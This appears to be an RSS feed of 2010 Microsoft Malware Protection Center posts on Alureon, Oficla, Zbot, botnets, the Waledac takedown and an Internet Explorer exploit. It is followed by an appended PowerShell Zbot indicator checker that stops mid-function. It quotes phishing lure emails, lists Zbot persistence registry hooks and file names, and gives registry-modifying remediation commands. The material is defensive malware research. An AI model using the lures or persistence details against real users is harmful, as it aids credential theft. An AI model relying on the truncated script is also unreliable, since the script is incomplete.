<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet Security Observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>MSRT May Threat Reports and Alureon</title><description>2010-05-22 06:16:31 - Microsoft Malware Protection Center : Last month we reported good cleaning results against the Win32/Alureon rootkit, and this month we have more good numbers to share with the May edition of MSRT. As in the previous month, we continued to add detection for newer variants of Alureon.

Variant / Computers Cleaned / Change:
Virus:Win32/Alureon.A: 47,310 (+12%)
Virus:Win32/Alureon.B: 5,546 (-40%)
Virus:Win32/Alureon.F: 20,717 (-21%)
Virus:Win32/Alureon.G: 50,581 (-32%)
Virus:Win32/Alureon.H: 155,394 (+100%)
Alureon Trojans and Droppers: 81,521 (+12%)
Total: 361,069 (+41%)

[image] As can be inferred from the numbers, compared to last month the new H variant is the most prominent in terms of prevalence. There were several changes to the design of the rootkit to avoid detection and cleaning, revealing that the rootkit is still under active development and distribution. One of the notable changes was to infect arbitrary system drivers instead of only the hooked miniport driver. As expected, this can have negative side effects on the machine depending on the chosen driver. For example, we've seen some machines having their keyboard disabled as a result of an infection. On other machines, Windows XP unexpectedly requests reactivation because the infection looks like a significant hardware change. Moreover, the trend percentages also show that some older variants of the rootkit "upgrade" to the latest version relatively quickly after a new release. However, the A variant is still prevalent because of its use with a different malicious payload, called zooclicker. Overall, the number of computers cleaned increased by a whopping 37% compared to April due to a spurt in detections of the newest variant, and as a result Alureon climbed to the number 1 family spot in MSRT May. [image] Continuing the trend from last month, more than two-thirds of the infections occur on machines running Windows XP. This aligns with the findings of the Microsoft Security Intelligence Report, which states that malicious software infection rates differ significantly between versions of the Microsoft Windows operating system, and that infection rates for more recently released operating systems are consistently lower than for previous ones, for both client and server platforms. [image] The geographical distribution is consistent with last month's statistics and still reflects the prevalence bias of the malware in English-speaking countries. Moreover, the new family for this month, Win32/Oficla, was cleaned from 74,690 machines. In total, MSRT May cleaned malware infections from 1,961,243 machines, and below are the most prevalent threat families cleaned with MSRT in May.

Family / Machines Cleaned:
Alureon: 356,959
Frethog: 321,600
Taterf: 261,553
Rimecud: 225,005

As always, we strongly urge users to run the latest version and updated signatures of an anti-malware product such as our Microsoft Security Essentials in order to stay protected. - Vishal Kapoor and Joe Johnson</description><link>http://www.secuobs.com/revue/news/224658.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/224658.shtml</guid></item>
<item><title>MSRT May 2010: On the Offensive Against the Odious Oficla</title><description>Secuobs.com : 2010-05-13 06:12:29 - Microsoft Malware Protection Center - The family added to this month's MSRT release is Win32/Oficla, a downloader that is able to receive download 'tasks' from a control server. In the wild, variants of Win32/Oficla have been observed downloading variants from families such as Win32/Cutwail, Win32/Zbot, Win32/Alureon, Win32/FakeScanti and Win32/FakeRean. The Win32/Oficla package, which includes the software infrastructure to manage and control the Oficla drones, is sold online. The controller is able to inspect various statistics for a given set of drones via a browser-based interface. The interface also has the ability to initiate and maintain different download tasks that Win32/Oficla will be directed to perform. The author(s) of Win32/Oficla appear to have started advertising their 'wares' online in April 2009. The asking price at that point in time was between $450 and $700 USD, depending on the version. Win32/Oficla is often delivered as a file attachment within e-mail messages of spam campaigns. Many of the e-mail lures employed are those with parcel delivery themes (for example, UPS, DHL, etc.). These are the very same lures observed as part of Win32/Bredolab campaigns, which may explain some confusion between these two malware families. Here are a couple of different emails from the last week.

iTunes lure:
Subject: Thank you for buying iTunes Gift Certificate
Body: Hello! You have received an iTunes Gift Certificate in the amount of $50.00. You can find your certificate code in attachment below. Then you need to open iTunes. Once you verify your account, $50.00 will be credited to your account, so you can start buying music, games, video right away. iTunes Store

Contract lure:
Subject: Open an account
Body: Dear Customers, We have prepared a contract and added the paragraphs that you wanted to see in it. Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment. We are enclosing the file with the prepared contract. If necessary, we can send it by fax. Looking forward to your decision.

Stay safe out there! - Scott Molenkamp</description><link>http://www.secuobs.com/revue/news/221713.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/221713.shtml</guid></item>
<item><title>Updating Pays Security Dividends</title><description>Secuobs.com : 2010-05-12 04:55:14 - Microsoft Malware Protection Center - In the newly published Volume 8 of the Microsoft Security Intelligence Report (SIR), you will find a familiar observation on malware infection across Windows operating systems, based on the Microsoft Windows Malicious Software Removal Tool (MSRT), one of the datasets that contributed to the SIR. [image: SIR - infection rates by OS] What's new is the first appearance of Windows 7 and Windows Server 2008 R2, both released in late 2009. The data shows that Windows 7 is less likely to be infected by malware than the earlier client OSes, and that Server 2008 R2 is less likely to be infected than older versions of the server OSes. For example, the CCM for Server 2008 R2 was 18 (read as: out of 1,000 MSRT executions on Server 2008 R2, 18 machines were found infected with prevalent malware covered by the MSRT detection capability) vs. a CCM of 30 for Server 2008 SP2 and 36 for Server 2008 RTM. There are other takeaways from this figure:
1. A newer OS with a higher service pack (which includes the security vulnerabilities fixed in security updates at the time of issue) is in general less likely to be infected.
2. A 64-bit OS (with security hardening like PatchGuard and Data Execution Prevention) is more resilient to malware than its 32-bit counterpart. One exception is Windows Server 2003 SP2, where the CCM on x64 is higher than on x86, which was called out in the SIR as "a reflection of the increasing dominance of 64-bit computers in the general server population and the accompanying relegation of 32-bit server platforms to specialized situations".
3. A server OS (usually in a more locked-down environment) is safer than a client OS.
This has been a consistent observation since the inception of the SIR. For more information, read on at http://www.microsoft.com/sir. - Scott Wu</description><link>http://www.secuobs.com/revue/news/221228.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/221228.shtml</guid></item>
<item><title>MSRT April Threat Reports - Alureon</title><description>Secuobs.com : 2010-05-01 00:06:27 - Microsoft Malware Protection Center - Following up on the blog post that our friends in the Microsoft Security Response Center published a few weeks ago, we wanted to share the results from the April edition of MSRT. As part of our ongoing updates to families already in MSRT, we have added support for more variants of the Win32/Alureon rootkit infector, including the ones responsible for the issues widely reported with Microsoft Security Bulletin MS10-015. Below is a summary of the Alureon cleaning using MSRT in April.

Variant / Computers Cleaned:
Virus:Win32/Alureon.A: 43,620
Virus:Win32/Alureon.B: 7,297
Virus:Win32/Alureon.F: 36,586
Virus:Win32/Alureon.G: 102,549
Alureon Trojans and Droppers: 72,917
Total: 262,969

[image] We had also previously mentioned in our blog post that although the Alureon family has been around for years, some variants (A-F) gained a lot of attention since they conflicted with Microsoft Security Bulletin MS10-015 and rendered machines unbootable after the update to ntoskrnl.exe was applied. Within a few days, the rootkit authors updated Win32/Alureon.G to avoid the issue, since it was attracting a lot of unwanted attention. Moreover, Microsoft also re-released Microsoft Security Bulletin MS10-015 with new heuristic checks in the installer that identify symptoms of the rootkit, preventing the patch from being applied on affected machines while warning the users of the issue. The recently released Microsoft Security Bulletin MS10-021 demonstrates a similar behavior. The good news, however, is that once MSRT April installs and cleans Alureon from the machine, these patches can be installed successfully to secure the machine. [image] It can be inferred from the chart that around two thirds of the total infections occurred on Windows XP. A quick look at the manifest of a sample installer reveals that the malware explicitly requests elevation to install. This reiterates the necessity of employing security best practices such as User Account Control (UAC) to thwart the malware. [image] Analyzing the geographical distribution, it can be seen that the majority of the infections occur in English-speaking countries. Since the rootkit installers frequently include quotations from Hollywood pop culture, it is apparent that the authors are intimately familiar with the latest US pop culture trends. Apart from tackling the Alureon variants, the newly added threat family for this month, Win32/Magania, was cleaned from 43,394 machines. In total, MSRT April cleaned malware infections from 3,168,563 machines since it was released on the 13th of this month. Below are the top six most prevalent threat families cleaned with MSRT in April.

Family / Computers Cleaned:
Frethog: 831,289
Taterf: 372,597
Alureon: 262,969
Rimecud: 250,603
Hamweq: 225,104

Four out of the top five (Frethog, Taterf, Rimecud and Hamweq) are worms taking advantage of propagation mechanisms that traditionally lead to outbreaks. These worms use shared mapped drives, removable devices and autorun behaviors, all of which are common attack surfaces that we've combated for years. We highly recommend reading the section "Protecting Against Malicious and Potentially Unwanted Software" in the latest edition of the Microsoft Security Intelligence Report, which provides great advice on preventing the spread of infections and tackling malware in general, to ensure that you and any users you may support stay fully protected. - Joe Johnson and Vishal Kapoor</description><link>http://www.secuobs.com/revue/news/217854.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/217854.shtml</guid></item>
<item><title>Announcing Microsoft Security Intelligence Report, Volume 8</title><description>Secuobs.com : 2010-04-27 03:45:03 - Microsoft Malware Protection Center - The eighth volume of the Microsoft Security Intelligence Report is going live today. Inside, you'll find 248 pages of in-depth information about malware, spam, malicious Web sites, vulnerabilities, and exploits that are relevant to the Windows platform. This volume contains a new Mitigation Strategy section that provides collective advice and best practices from our own Microsoft IT organization along with other security experts from all around Microsoft. We've also greatly expanded our international coverage section for malware distribution: you'll find detailed analysis for 26 countries around the globe. Be sure to check out the Key Findings Summary to get a good overview of the highlights. We'll be posting some additional pieces to this blog to provide in-depth analysis of other sections over the next few weeks, so stay tuned. The key findings and full report can be found at http://www.microsoft.com/sir.</description><link>http://www.secuobs.com/revue/news/216250.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/216250.shtml</guid></item>
<item><title>A case of mistaken identity</title><description>Secuobs.com : 2010-04-23 12:01:10 - Microsoft Malware Protection Center - There have been many instances where a virus infects an unintended target; this time it's a variant of Virus:Win32/Huhk. As the name indicates, this virus usually attempts to infect x86 PE files. I came across a sample which contains the virus code, but there was something different about it. [image: header from the infected file] Yes, the infected file is a Windows CE binary for the ARM architecture. When virus writers don't perform more than the basic checks, such as ensuring the file is a Windows executable (PE check), we end up with corrupt infections that can be difficult to clean. In such cases it's best to restore from backup. Note this also means that the virus code will not execute correctly on an ARM processor when the infected host is run. - Raymond Roberts</description><link>http://www.secuobs.com/revue/news/215356.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/215356.shtml</guid></item>
<item><title>Gamania - Ill-gotten game gains</title><description>Secuobs.com : 2010-04-13 23:22:19 - Microsoft Malware Protection Center - Well kids, it's that time of the month again: MSRT Tuesday! Continuing the trend on from last month, the target du jour is password stealers that target online games (we like to do these things in groups, you see). Our motif for this month is a lovely shade of grey I call "password stealer", with juxtapositions of process injection, with a penchant for passwords of the online game variety; but of course we are referring to PWS:Win32/Magania, mon ami. Win32/Magania is another delivery mechanism used by various online game password stealers. Unfortunately, this probably means that if you're infected with it, it's brought a few malicious friends along for the ride. It also means that you should be changing your online passwords as soon as you can, once you're sure the machine is no longer infected, of course. If you haven't already, one way to help ensure you're not infected is to download and install our available-at-no-charge antivirus product, Microsoft Security Essentials. I know, I'm relentless with the shameless plugs, but I'm a nice person despite that. Stay safe out on the intertubes, kids. Matt McCormack, MMPC Melbourne, Australia</description><link>http://www.secuobs.com/revue/news/211720.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/211720.shtml</guid></item>
<item><title>Internet Café, DirectX, and Online Games</title><description>Secuobs.com : 2010-04-07 04:00:27 - Microsoft Malware Protection Center - Last February, our colleague Chun blogged about TrojanDownloader:Win32/Chekafe.A, which checks if the system is in an Internet cafe and, if so, downloads password-stealing trojans related to MMORPG online games. Now we look deeper into one of the downloaded trojans, PWS:Win32/OnLineGames.GP (example SHA1: 935c02f86ed1212237a6a78801f41eb4a43d9ade). PWS:Win32/OnLineGames.GP, just like other password-stealing trojans, monitors certain processes related to MMORPG online games in order to steal account information: the account password, character status and gold count. Over the years we've seen these password-stealing trojans evolve from logging keystrokes to monitoring window names and even adding worm capabilities. Lately we have observed that, aside from the above-mentioned arsenal, PWS:Win32/OnLineGames.GP patches specific DLL files. What do we mean when we say "patch"? Patched files in this case are files into which a tiny piece of malicious code has been inserted. In the case of PWS:Win32/OnLineGames.GP, it patches a DLL file including but not limited to the following: dsound.dll, ddraw.dll, d3d9.dll. The patched-in malicious code usually tries to execute or load the dropped components of PWS:Win32/OnLineGames.GP. The patched DLL files are detected as variants of the Virus:Win32/Patchstart or Virus:Win32/Patchload family. Now, why patch only these particular files? The answer is that these DLL files are related to DirectX. Then, why patch DirectX-related DLL files? The reason is that most online games are likely to use DirectX to render advanced graphics in the game. Since this trojan targets online games, it's more likely that these DLL files are loaded when the game starts. In effect, this enables the password-stealing trojan to load as well: every time the game is played, the malware is also activated. Here are the common games we've seen being targeted: Aion, DNF, Lineage, Perfect World. These games are very popular in Asia. Looking through the geographic location of detections found from December 2009 to March 2010, it's pretty similar for all the malware families we've mentioned. [images: Patchstart, Patchload, OnLineGames.GP] Based on the geographic distribution in all three charts, a huge percentage of infections are found in China. For PWS:Win32/OnLineGames.GP, China and the USA are the most affected by the threat. In case you suspect that you have been hacked or infected by this type of malware, we highly suggest that you change your account password immediately. You can also use our free online scanner as well as Microsoft Security Essentials, at no charge, to check for and remove these threats. You can also send us samples of files if you suspect that they are malicious or have been infected. Enjoy playing. Level up! - Elda Dimakiling and Francis Tan Seng</description><link>http://www.secuobs.com/revue/news/209555.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/209555.shtml</guid></item>
<item><title>Active Exploitation of CVE-2010-0806</title><description>Secuobs.com : 2010-03-30 23:47:47 - Microsoft Malware Protection Center - On March 9, Microsoft started investigating reports of targeted attacks using a previously undisclosed vulnerability (CVE-2010-0806) affecting Internet Explorer 6 and 7 (Internet Explorer 8, Windows 7, and Windows Server 2008 R2 are not susceptible). As a member of the Microsoft Active Protections Program (MAPP), the MMPC and other members received information about the vulnerability and immediately deployed protection for our customers. We've been tracking exploit attempts against this vulnerability since then, working with MSRC to monitor the state of attacks. When proof-of-concept code became available in public exploit testing tools on March 10, and by March 12, the attack landscape escalated. The mitigating signatures providing protection for this issue are Exploit:JS/CVE-2010-0806 and Exploit:JS/MultCR. These signatures protect customers through Microsoft Security Essentials, Microsoft Forefront Client Security, Windows Live OneCare, the Forefront Threat Management Gateway, and the Windows Live Safety Platform. Targets have spanned over 50 countries, but the most frequently targeted computers have been in China and Korea, with the US trailing in a distant third place. [image] Unprotected users are susceptible to infection when they browse to a malicious Web page that attempts to exploit this vulnerability. If the exploit is successful, a number of malware families may be installed on the victim's computer. The majority of the malware downloaded after a successful exploit are trojans. Some of the variants we have seen are: Trojan:Win32/Wisp, TrojanDropper:Win32/Lisiu, TrojanDropper:Win32/Agent.gen!I, TrojanDownloader:Win32/Small.gen!AZ, Backdoor:Win32/Agent.FS, TrojanDropper:Win32/Frethog. Like the lifecycle of most vulnerabilities, we expect the threat landscape to mellow with the release and adoption of updates and protection. We encourage you to apply Microsoft Security Bulletin MS10-018 as soon as possible and to install an anti-virus solution, such as Microsoft Security Essentials, to protect yourself from these threats. You can also get free virus-related assistance from Microsoft through Microsoft Help and Support. - Holly Stewart, MMPC</description><link>http://www.secuobs.com/revue/news/207092.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/207092.shtml</guid></item>
<item><title>Bots, bots, and again bots</title><description>Secuobs.com : 2010-03-16 23:57:36 - Microsoft Malware Protection Center - Today we are going to take a closer look at bots and botnets. On the black market, selling bots and botnets is quite profitable, which makes creating them a popular activity for criminals. It helps that bot sources and creation kits are available on the Internet, allowing even script kiddies to create their own botnets. Another reason bots get created is that some people who get bored in their daily lives tend to do things that, in their opinion, might earn them respect or admiration in front of their peers or in various Internet chat rooms. Let's just clarify briefly what we mean when we say "bot" and "botnet". A "botnet" is a set of computers controlled by a command-and-control (C&amp;C) computer to execute commands as directed. The C&amp;C computer can issue commands directly or by using a decentralized mechanism. Computers in the botnet are often called "bots" or "zombies". A "bot herder" or "bot master" is the person who controls the botnet. One common way botnets spread is through torrents. Even though it might not seem too productive in terms of bots per day, it's one of the easiest. In this context there are two categories of bot herders: the newcomers and those that have been in the field for quite some time. Those that are new to this activity just seed an infected torrent, which the webmaster will take out. This means that in a very short time the infected torrent is removed and their account is banned. The guys that know what they're doing seed several clean torrents and from time to time they seed an infected one. Basically, they're trying to imitate what a normal uploader does. By building a good reputation as an uploader/seeder, their account won't be banned so easily. Other popular ways of spreading are through YouTube, various chat rooms, and social networks. Functionality can be added to bots so they spread faster through instant messenger programs and USB sticks (removable drives). These methods are more efficient in terms of how many computers get infected per day. In order to control all those infected computers, some criminals may buy offshore virtual private server (VPS) systems. They can get these for as little as 10 USD per month (most probably paid with stolen credit cards or PayPal accounts) and with full root access. Once the IP of their VPS is reported and banned (for botnet activity), the criminals can buy another one. That's also one of the reasons they use dynamic DNS: if one IP gets banned, in a matter of seconds they can have another system up and running and linked to the domain name. After that, it's trivial to set up a Web interface with PHP and an SQL server on the VPS. For example, some versions of Zbot come with a multi-language Web panel that allows the herder to easily view and control the zombies. The bot master has at his or her disposal information about the infected systems (OS version, OS language, country, IP, latency, online time, etc.) and is able to send various commands (download and execute files, execute local files, block URLs, reboot/shutdown the system, etc.). You can read more on the Zbot family here. Another way to control all those zombies is through password-protected IRC channels. In some cases this method might be preferred because there is no need to buy anything and it allows for the same degree of control, although it doesn't offer the same good-looking interface. Using an IRC client, an attacker might be able to easily control several botnets at once, just by switching from one window to another. After creating a bot army, the bot master can sell or rent the bots for as cheap as 10 cents per bot. Most of those guys usually have tens or possibly hundreds of infected computers at their disposal, but there are people who control thousands or tens of thousands of computers, and possibly even more. It's not that easy to get such high numbers. Most bots are quickly detected and removed from the infected systems. That's why there is a continuous struggle in the criminal world to develop and use obfuscators to make the bots harder for antivirus programs to detect. Another way to fight botnets is by taking down their ISPs, or those ISPs that are protecting these criminals. Exactly this happened to the Troyak ISP last week, and even though those command-and-control servers are most likely going to be back online, it will take some time until they regain "their strength". That's why we recommend installing an antivirus solution like Microsoft Security Essentials, to stay protected from such pests. -- Andrei Saygo</description><link>http://www.secuobs.com/revue/news/202374.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/202374.shtml</guid></item>
<item><title>What we know (and learned) from the Waledac takedown</title><description>Secuobs.com : 2010-03-16 05:24:59 - Microsoft Malware Protection Center - Recently, following an investigation to which various members of the MMPC contributed, Microsoft's Digital Crimes Unit initiated a takedown of the Waledac botnet in an action known as Operation b49, an ongoing operation to disrupt the botnet for the long term. The takedown also marked a new phase of exploration in combating botnets, which we call Project MARS (short for Microsoft Active Response for Security). While it is still too early to know the entire scope of this particular takedown's impact, early returns show that Operation b49 has been delivering on the disruption of Waledac and helping to map new territory in the fight against botnets. I wanted to update you on what we know and what we are still learning regarding the impact of that fight. To effectively counter a botnet like Waledac, we knew a multi-layered approach was needed: one that included peer-to-peer communication disruption through technical countermeasures, domain-level takedowns to disrupt the "phone home" communications between zombie PCs and the command-and-control servers for Waledac, and traditional server takedowns to sever the back-end command-and-control mechanisms most directly under the control of the bot master(s). With the caveats that there are rarely, if ever, any absolutes regarding botnets and that we are still analyzing and investigating the impact of this action, early data from Microsoft and other researchers indicate that our actions have effectively decimated communications within the Waledac bot network. For example, researchers from the Shadowserver Foundation, the Technical University in Vienna, University of Mannheim, University of Bonn and University of Washington have analyzed honeypot data on Waledac and have observed an effective cessation of commands to Waledac 'zombies'. That's good news because it indicates that Operation b49 effectively severed between 70,000 and 90,000 computers from this botnet, meaning that those customers are less likely to see the rogue security software pop-ups, malware downloads, outgoing spam and ID and password theft associated with a Waledac infection. We've also been tracking Operation b49's impact on the symptoms of Waledac infection: symptoms that include malware downloads, identity theft and spam attacks from infected computers against other victims. Researchers at Sudosecure who track new Waledac infections have data showing a dramatic decline in new IP addresses appearing within the Waledac network, meaning that Waledac is no longer spreading its infection to other computers. While there will likely always be some fluctuations as long as the underlying malware exists, and we must and will continue to work with the security community to stay on top of Waledac over time, the 'zero new infections' number reported by Sudosecure as of February 27 is a great indicator of the success of these efforts so far. As for spam, the trends we've been seeing since the takedown provide valuable insight into the nature of infections on zombie computers. Waledac itself is just one of many sources of spam on the Internet, and we never intended Operation b49 to appreciably shrink worldwide spam volumes. The goal, rather, was to disrupt the bot and to learn from that disruption for future actions. As we knew going in, the computers within the Waledac botnet are still infected with the original malware that gave herders control of them in the first place. What we've learned since the takedown from our initial data is that many of them are likely infected by other malware that may still be directing them to conduct attacks outside of Waledac's control structure. We base this hypothesis on the evidence that honeypot computers infected only with Waledac are not sending spam nor getting commands to execute any other attacks. However, Hotmail data and our examination of the behavior of all the known IP addresses of the previously infected Waledac computers show that about half of the computers once under the control of Waledac are still trying to send spam, and are in fact doing so at higher levels today than they were in our December analysis. Since spam campaigns have spikes and lulls, it's difficult to make direct comparisons of spamming behavior over time, but this data also seems to align with what we're hearing from others in the industry. We've also learned from this experience that our legal action has so far been successful in helping to sever the command-and-control communications for Waledac at the domain level. In fact, since the original takedown occurred, we have worked with two affected domain owners (Stephen Paluck and eNom) to successfully address the problems with their respective domains, and we have amended our legal filings to reflect that we are pursuing no further injunctive relief from the court on those domains. (See www.noticeofpleadings.com for all legal documentation and presented evidence in this case as it proceeds.) Other registered domain owners named in the legal filings have not yet exercised their due process rights by responding to the court, but the case is still ongoing. Our goal with this lawsuit is to help promote a safer, more secure Internet, and we will continue to work toward that aim as we move forward in the case. These and other findings demonstrate what, for us, is perhaps the most critical outcome of this case: proof of concept. As we forge ahead with Project MARS, we'll be looking to the lessons of Operation b49 as successful signposts along the road in this uncharted territory. While no one action will wipe out every threat, any strong action to disable a botnet is significant progress, and each action will inform the next. For example, we've also recently seen Spanish authorities take down another notorious botnet, Mariposa, with great success, and we commend them for their valuable work. These actions demonstrate how critical the incredible cooperation of stakeholders and experts all around the world is to success. Look for more efforts like these as we work together to take a stand against botnets and make the Internet safer and more secure for everyone. Anyone concerned that their computer may be infected by malware should follow the "protect your PC" guidance available at http://www.microsoft.com/protect. Windows customers can also visit http://www.microsoft.com/security/malwareremove/default.aspx to find Microsoft's Malicious Software Removal Tool, which removes Waledac and other malware. So, stay tuned. The fight goes on. -- Jeff Williams</description><link>http://www.secuobs.com/revue/news/202032.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/202032.shtml</guid></item>
<item><title>Got Zbot?</title><description>Secuobs.com : 2010-03-12 04:28:43 - Microsoft Malware Protection Center - PWS:Win32/Zbot (aka Zeus, WSNPoem) is a password-stealing trojan that monitors for visits to certain Web sites. It allows limited backdoor access and control and may terminate certain security-related processes. In our collection, although we have some Win32/Zbot malware toolkit builder samples that date back to the first quarter of 2008, we had already received and created detections for a number of Win32/Zbot samples from earlier, as early as the last quarter of 2006 (an early SHA1 is 006227158415078de14b4fe889dfe8dedfcf4e0b). Win32/Zbot evolves as it is circulated and maintained by a number of malicious and unrelated distributors, who use varying distribution vectors (spam runs, drive-by downloads, exploits, etc.), which, mind you, explains why this critter has weathered more than 3 years and is still around and active. If you have been infected by this malware, well, suffice it to say that you are not alone. Our telemetry shows that Win32/Zbot infections reported back by a number of our services have rocketed sky high as of late. (Chart: Zbot sample distribution from 2007 to present.) The geographical distribution of the above reported data also shows that almost 75 percent of Win32/Zbot infections are in the United States and the United Kingdom. This suggests there may be a language bias in the social engineering approach used by the distributors of this malware. (Chart: Zbot cumulative distribution by region.) Generally, each public build of Win32/Zbot produced by these "kits" can be categorized by how it copies and installs itself to the machine, and normally the malware's default installation behavior is not easy to change, so the toolkit user opts not to bother with it anyway. Most, if not all, of them fall under one of the following variants (as discussed in our encyclopedia entry):

Variant 1
  Dropped files: ntos.exe (Win32/Zbot); wsnpoem\video.dll (configuration file); wsnpoem\audio.dll (stolen data)
  Registry startup: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, userinit = "userinit.exe, ntos.exe,"
  Example SHA1: 006227158415078de14b4fe889dfe8dedfcf4e0b

Variant 2
  Dropped files: twext.exe (Win32/Zbot); twain_32\local.ds (configuration file); twain_32\user.ds (stolen data)
  Registry startup: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, userinit = "userinit.exe, twext.exe,"
  Example SHA1: 50be83e3b1b71448375411120c436c04497b1ad9

Variant 3
  Dropped files: twex.exe (Win32/Zbot); twain32\local.ds (configuration file); twain32\user.ds (stolen data)
  Registry startup: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, userinit = "userinit.exe, twex.exe,"
  Example SHA1: 290d33efedd0281021940eba1d60a2091a991d0e

Variant 4
  Dropped files: sdra64.exe (Win32/Zbot); lowsec\local.ds (configuration file); lowsec\user.ds (stolen data)
  Registry startup: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, userinit = "userinit.exe, sdra64.exe,"
  Example SHA1: 842f84c2c8d3be5e425787c6e9cac3d6a377e76e

Remember, Win32/Zbot's main objective is to steal sensitive information, including a user's online credentials. Thus it makes sense that if you think your credentials have been compromised, you should immediately change them on a clean and trusted system. Microsoft offers the following services to keep you protected against current threats while using your computer: our online scanner, Microsoft Security Essentials and Microsoft Forefront Security. Good luck and stay safe. --Jireh Sanico

PS: While the best way to detect and clean a Win32/Zbot infection is to use an up-to-date antivirus scanner like the ones mentioned above, if you are unable to do so, or if you suspect that you have a new or undetected Zbot infection, then you could use the following instructions. These instructions help you determine whether you are infected by Zbot and disable the malware before submitting a sample of the suspect file for our analysis. Please note that manually modifying the registry is generally not recommended, and we urge you to use caution if you choose to do so.

One can do a quick check for the existence of this malware manually using the Windows command prompt. The configuration and data files tucked in their respective folders are hidden in Windows Explorer but can be seen using the DIR command (dir /a lists hidden files). IMAGE (zbot_pic0)

A clean system by default should not have any unique ID made by the malware, so if you run the following:
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network" /v UID
-- or --
REG QUERY "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network" /v UID
an infected machine would return data in the format computername_id, for example COMP1_00038EB9. IMAGE (zbot_pic1)

The userinit startup key specifies what program should be launched right after a user logs on to Windows. Win32/Zbot appends its own path to the data value and protects that value from being changed while it is active. Running the following query returns the Zbot program (in the screenshot below it is sdra64.exe):
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit
IMAGE (zbot_pic2)

Win32/Zbot injects code into running processes, so a system reboot is the easiest way to take it out of memory, but first we need to disable it and prevent it from loading during startup, like so (proceed with caution):
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v PendingFileRenameOperations /t REG_MULTI_SZ /d "c:\windows\system32\sdra64.exe\0c:\windows\system32\sdra64.ex_\0"
IMAGE (zbot_pic3)
The above command renames the malicious file c:\windows\system32\sdra64.exe to c:\windows\system32\sdra64.ex_ when the system is restarted, so there is now a chance to throw the malware our way. Note that if the malicious file is not sdra64.exe, you will have to substitute the Zbot file name on your computer. IMAGE </description><link>http://www.secuobs.com/revue/news/200984.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/200984.shtml</guid></item>
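The manual check described in the post above, as an added PowerShell example that is not part of the original post: it looks for the three indicators the post lists (an extra entry in the Winlogon Userinit value, a UID value under either Network key, and the hidden executable/config/data files of all four variants at once) and offers the same rename-at-reboot that the post's REG ADD command performs. The indicator names come from the post; the function names, the script layout and the choice to append to PendingFileRenameOperations rather than overwrite it are this example's own assumptions. Run it elevated.

```powershell
# Added example, not from the MMPC post: triage the four Win32/Zbot installation
# variants listed in the post from PowerShell (run elevated). Indicator names
# (ntos.exe, twext.exe, twex.exe, sdra64.exe, their wsnpoem/twain_32/twain32/lowsec
# folders, the Winlogon Userinit hook and the Network\UID marker) are from the post;
# the function names and the append-safe reboot rename are this example's own.

$ZbotVariants = @(
    @{ Exe = 'ntos.exe';   Dir = 'wsnpoem';  Files = @('video.dll', 'audio.dll') }
    @{ Exe = 'twext.exe';  Dir = 'twain_32'; Files = @('local.ds', 'user.ds') }
    @{ Exe = 'twex.exe';   Dir = 'twain32';  Files = @('local.ds', 'user.ds') }
    @{ Exe = 'sdra64.exe'; Dir = 'lowsec';   Files = @('local.ds', 'user.ds') }
)
$Winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$System32 = Join-Path $env:windir 'system32'

# A clean Userinit value is "%windir%\system32\userinit.exe," (note the trailing
# comma). Zbot appends its own path, so return every entry that is not userinit.exe.
function Get-SuspiciousUserinitEntries {
    param([string]$Value = (Get-ItemProperty -Path $Winlogon -Name Userinit).Userinit)
    ($Value -split ',') |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ -ne '' -and $_ -notmatch '\\userinit\.exe$' }
}

# A clean system has no UID value under either Network key; Zbot writes
# COMPUTERNAME_xxxxxxxx there.
function Get-ZbotUidMarker {
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "$($hive):\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network"
        $uid = Get-ItemProperty -Path $key -Name UID -ErrorAction SilentlyContinue
        if ($uid) { [pscustomobject]@{ Key = $key; UID = $uid.UID } }
    }
}

# The config and data files are hidden; Test-Path and Get-Item -Force still see them.
function Get-ZbotDroppedFiles {
    foreach ($v in $ZbotVariants) {
        $paths = @(Join-Path $System32 $v.Exe) +
                 @($v.Files | ForEach-Object { Join-Path $System32 "$($v.Dir)\$_" })
        $paths | Where-Object { Test-Path -LiteralPath $_ } |
            ForEach-Object { Get-Item -LiteralPath $_ -Force | Select-Object FullName, Attributes, Length }
    }
}

# Same effect as the post's REG ADD (rename foo.exe to foo.ex_ at the next restart),
# but appending to PendingFileRenameOperations instead of replacing it (REG ADD /f
# would silently drop renames queued by other software) and using the \??\ form
# that MoveFileEx writes for this value.
function Add-RenameOnReboot {
    param([Parameter(Mandatory)][string]$Path)
    if ($Path -notmatch '\.exe$') { throw "expected a .exe path, got $Path" }
    $sm  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
    $cur = (Get-ItemProperty -Path $sm -Name PendingFileRenameOperations -ErrorAction SilentlyContinue).PendingFileRenameOperations
    $new = @($cur | Where-Object { $_ }) + @("\??\$Path", "\??\$($Path -replace '\.exe$', '.ex_')")
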